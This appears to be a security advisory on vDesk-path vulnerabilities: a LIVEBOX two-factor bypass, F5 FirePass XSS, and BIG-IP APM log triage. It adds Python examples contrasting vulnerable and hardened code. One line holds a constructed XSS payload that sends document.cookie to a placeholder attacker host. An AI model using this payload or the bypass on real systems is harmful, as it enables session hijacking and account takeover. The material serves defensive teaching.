Between 2022 and 2024, security researchers from the TIM Red Team (Massimiliano Ferraresi, Andrea Carlo Maria Dattola, Luca Borzacchiello and Massimiliano Brolli) discovered and disclosed a series of vulnerabilities in LIVEBOX Collaboration vDesk, affecting releases up to v018 and v031. LIVEBOX Collaboration vDesk is a separate product from the F5 FirePass and BIG-IP APM gateways whose /vdesk/ URI path is discussed below; the two share a name, not code.

2FA Bypass (CVSS 9.8): Among the vDesk findings, for SAML users the system fails to properly verify TOTP correctness before accepting a backup code. An attacker can bypass two-factor authentication entirely by submitting any arbitrary string as the backup code.

History: Older F5 FirePass releases (e.g., v6.0.2) had Cross-Site Scripting (XSS) vulnerabilities in related /vdesk/ paths such as /vdesk/admincon/webyfiers.php (CVE-2008-2637), and /vdesk/hangup.php3, the FirePass logout page, was exploitable in the same way. The exploit was confirmed working on Internet Explorer 6.0.2900.2180 and Internet Explorer 7.0.5730.11, with subtly different behaviour between browser versions; that difference highlights the complexities of cross-browser vulnerability testing.

Session Management: The most severe risk was session hijacking. By injecting JavaScript that steals the victim's session cookie (via document.cookie), the attacker could capture the authenticated session of a FirePass administrator and, using that cookie, masquerade as the administrator without needing the password and without having to defeat multi-factor authentication, since the stolen session was already authenticated.

Credential Theft: By injecting a fake login form overlaying the legitimate one, the attacker could capture users' credentials as they typed them, while the victims believed they were logging into the VPN.

Foothold: With an administrator session, attackers gain a foothold on the gateway, allowing them to pivot deeper into the internal corporate network.

Modern BIG-IP APM Behaviour: Seeing this URI in your logs usually just means a user logged out or a scanner hit your gateway. If a client sends an HTTP request with a Host header that does not match the APM Virtual Server's configuration, the system redirects it to /vdesk/hangup.php3 as a security measure to prevent unauthorized access. High volumes of traffic hitting this endpoint may therefore indicate automated scanners probing for misconfigured Host headers or expired sessions.

Recommendations include:
Patch: Subscribe to F5's security notification service and apply patches for CVEs affecting your BIG-IP version, including CVE-2025-53521, disclosed in March 2026.
Restrict access: Lock down the vDesk administrative directories so that they are reachable only from trusted internal IP addresses or over a secure Virtual Private Network (VPN).
Audit custom code: If you maintain proprietary or heavily modified code, audit hangup.php3. Replace dangerous functions with secure alternatives, enforce strict type-casting (e.g., ensure session_id is strictly an integer), and use parameterized inputs for any database access.
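The following is an added example, not code from the original page or from F5, showing the reflected-XSS bug class behind the session-cookie theft described above next to the hardened form the recommendations call for (strict integer cast of session_id, output encoding, and an HttpOnly logout cookie). The logout handler, the parameter name session_id and the host attacker.example are assumptions for illustration; the payload is constructed.

```python
import html
import re
from urllib.parse import parse_qs, quote

# Constructed payload of the kind the article describes: it exfiltrates
# document.cookie to an attacker-controlled host (attacker.example is a
# placeholder, not a real server).
XSS_PAYLOAD = ("<script>new Image().src="
               "'https://attacker.example/?c='+document.cookie</script>")
ATTACK_QUERY = "session_id=" + quote(XSS_PAYLOAD, safe="")


def render_logout_vulnerable(query_string: str) -> str:
    """Reconstruction of the bug class (hypothetical, not F5's code): the raw
    session_id parameter is written straight into the HTML response."""
    params = parse_qs(query_string, keep_blank_values=True)
    session_id = params.get("session_id", [""])[0]
    return f"<p>Session {session_id} has been logged out.</p>"


class BadRequest(ValueError):
    """Raised when a request parameter fails validation."""


def parse_session_id(raw: str) -> int:
    # Strict type-cast: only an unsigned decimal integer is accepted; anything
    # else (including the payload above) is rejected before it reaches HTML.
    if not re.fullmatch(r"[0-9]{1,10}", raw):
        raise BadRequest("session_id must be an integer")
    return int(raw)


def render_logout_hardened(query_string: str) -> str:
    params = parse_qs(query_string, keep_blank_values=True)
    session_id = parse_session_id(params.get("session_id", [""])[0])
    # Output encoding is the second layer: even a validated value is escaped
    # before it is placed in the response body.
    return f"<p>Session {html.escape(str(session_id))} has been logged out.</p>"


def hardened_rejects(query_string: str) -> bool:
    """True if the hardened handler refuses the request."""
    try:
        render_logout_hardened(query_string)
    except BadRequest:
        return True
    return False


def expire_session_cookie(name: str = "session") -> str:
    """Set-Cookie value a logout page should emit (cookie name is assumed).
    HttpOnly keeps the cookie out of document.cookie, so a script injection
    elsewhere cannot read it; Secure and SameSite limit where it is sent."""
    return f"{name}=; Max-Age=0; Path=/; Secure; HttpOnly; SameSite=Strict"


if __name__ == "__main__":
    print(render_logout_vulnerable(ATTACK_QUERY))
    print("hardened rejects payload:", hardened_rejects(ATTACK_QUERY))
    print(render_logout_hardened("session_id=12345"))
    print("Set-Cookie:", expire_session_cookie())
```

Validation and encoding are kept as two separate layers on purpose: the integer check stops the payload at the boundary, and html.escape protects any future field that is not numeric.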
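The next block is an added example, not LIVEBOX's code, modelling the CVSS 9.8 two-factor bypass described above: a flawed verifier that, for SAML users, accepts any backup code without checking it, beside a fixed verifier that only accepts a stored, single-use code compared in constant time. The TOTP seed, backup codes, fixed clock and User class are constructed fixtures; the TOTP routine follows RFC 6238 with HMAC-SHA1.

```python
import hashlib
import hmac
import struct

# Constructed fixtures (not real credentials): a TOTP seed and a fixed clock
# so results are reproducible.
SECRET = b"12345678901234567890"
NOW = 1_700_000_000
BACKUP_CODES = ["4fz8-k2pq", "m7dd-x91c"]


def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP over HMAC-SHA1 (the common default)."""
    counter = struct.pack(">Q", unix_time // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    value = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return f"{value % (10 ** digits):0{digits}d}"


def _hash_backup(code: str) -> str:
    # Backup codes are stored hashed; a salted slow hash is preferable in
    # production, plain SHA-256 keeps the example short.
    return hashlib.sha256(code.encode()).hexdigest()


class User:
    def __init__(self, secret: bytes, backup_codes, via_saml: bool):
        self.secret = secret
        self.backup_hashes = {_hash_backup(c) for c in backup_codes}
        self.via_saml = via_saml


def make_user(via_saml: bool) -> User:
    return User(SECRET, BACKUP_CODES, via_saml)


def _totp_ok(user: User, code: str, now: int) -> bool:
    return bool(code) and hmac.compare_digest(code, totp(user.secret, now))


def verify_2fa_flawed(user: User, totp_code: str, backup_code: str, now: int) -> bool:
    """Reconstruction of the flaw as the article describes it: for SAML users
    the backup-code branch succeeds without checking the code at all."""
    if _totp_ok(user, totp_code, now):
        return True
    if user.via_saml and backup_code:
        return True  # BUG: any non-empty string passes
    return False


def verify_2fa_fixed(user: User, totp_code: str, backup_code: str, now: int) -> bool:
    """A backup code is accepted only if it matches a stored hash, compared in
    constant time, and it is consumed on use. The SAML flag plays no part."""
    if _totp_ok(user, totp_code, now):
        return True
    if backup_code:
        candidate = _hash_backup(backup_code)
        for stored in list(user.backup_hashes):
            if hmac.compare_digest(candidate, stored):
                user.backup_hashes.discard(stored)
                return True
    return False


if __name__ == "__main__":
    saml_user = make_user(True)
    print("flawed accepts junk:", verify_2fa_flawed(saml_user, "", "junk", NOW))
    print("fixed accepts junk:", verify_2fa_fixed(saml_user, "", "junk", NOW))
    print("fixed accepts real code:", verify_2fa_fixed(saml_user, "", BACKUP_CODES[0], NOW))
```

The fix removes the authentication-method flag from the decision entirely: how the user arrived (SAML or local login) must never change which second factors are checked, and a backup code that verifies is deleted so it cannot be replayed.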
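The last block is an added example, not F5's code or logs, covering the Host-header redirect behaviour and the log-triage advice above: it models the decision "Host header does not match the virtual server, so redirect to /vdesk/hangup.php3", then runs over constructed log lines to separate ordinary logouts from sources that look like scanners (mismatched Host header, or many hits in a short window). The virtual-server hostname, the log layout with the Host header as a trailing quoted field, and the thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

LOGOUT_URI = "/vdesk/hangup.php3"
# Hostnames configured on the APM virtual server (hypothetical).
VIRTUAL_SERVER_HOSTS = {"vpn.example.com"}

# Constructed sample lines in a combined-log-like layout with the request's
# Host header appended as the last quoted field. They are not real F5 logs.
SAMPLE_LOG = """\
203.0.113.10 - - [03/Jun/2025:09:14:03 +0000] "GET /vdesk/hangup.php3 HTTP/1.1" 200 512 "vpn.example.com"
198.51.100.7 - - [03/Jun/2025:09:14:05 +0000] "GET /vdesk/hangup.php3 HTTP/1.1" 302 0 "192.0.2.44"
198.51.100.7 - - [03/Jun/2025:09:14:05 +0000] "GET /vdesk/hangup.php3 HTTP/1.1" 302 0 "192.0.2.44"
198.51.100.7 - - [03/Jun/2025:09:14:06 +0000] "GET /vdesk/hangup.php3 HTTP/1.1" 302 0 "192.0.2.44"
198.51.100.7 - - [03/Jun/2025:09:14:06 +0000] "GET /vdesk/hangup.php3 HTTP/1.1" 302 0 "192.0.2.44"
198.51.100.7 - - [03/Jun/2025:09:14:07 +0000] "GET /vdesk/hangup.php3 HTTP/1.1" 302 0 "192.0.2.44"
192.0.2.99 - - [03/Jun/2025:09:20:00 +0000] "GET /vdesk/hangup.php3 HTTP/1.1" 200 512 "vpn.example.com"
192.0.2.99 - - [03/Jun/2025:09:41:00 +0000] "GET / HTTP/1.1" 200 1024 "vpn.example.com"
"""

LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \d+ "([^"]*)"$'
)


def host_header_decision(host: str):
    """Model of the behaviour described in the text: a Host header that matches
    no configured virtual-server name is answered with a redirect to the logout
    URI instead of being served. Returns (action, location)."""
    if host.lower() in VIRTUAL_SERVER_HOSTS:
        return ("serve", None)
    return ("redirect", LOGOUT_URI)


def parse_log(text: str):
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed layout
        ip, ts, method, path, status, host = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        events.append({"ip": ip, "when": when, "method": method,
                       "path": path, "status": int(status), "host": host})
    return events


def triage(text: str, rate_threshold: int = 5, window_seconds: int = 60):
    """Return {client_ip: set(reasons)} for sources whose hits on LOGOUT_URI
    look like scanning rather than ordinary logouts."""
    hits = defaultdict(list)
    hosts = defaultdict(set)
    for ev in parse_log(text):
        if ev["path"] != LOGOUT_URI:
            continue
        hits[ev["ip"]].append(ev["when"])
        hosts[ev["ip"]].add(ev["host"])

    flagged = defaultdict(set)
    for ip, times in hits.items():
        # A Host header the gateway would have redirected is a scanner tell.
        if any(host_header_decision(h)[0] == "redirect" for h in hosts[ip]):
            flagged[ip].add("bad-host")
        # rate_threshold hits inside window_seconds from one source.
        times.sort()
        for i in range(len(times) - rate_threshold + 1):
            span = (times[i + rate_threshold - 1] - times[i]).total_seconds()
            if span <= window_seconds:
                flagged[ip].add("high-rate")
                break
    return dict(flagged)


if __name__ == "__main__":
    for ip, reasons in triage(SAMPLE_LOG).items():
        print(ip, sorted(reasons))
```

A single logout from a known hostname (203.0.113.10 and 192.0.2.99 in the sample) is left alone; only the source that hammered the endpoint with a bare IP address in the Host header is flagged, which matches the distinction the text draws between a user logging out and a scanner hitting the gateway.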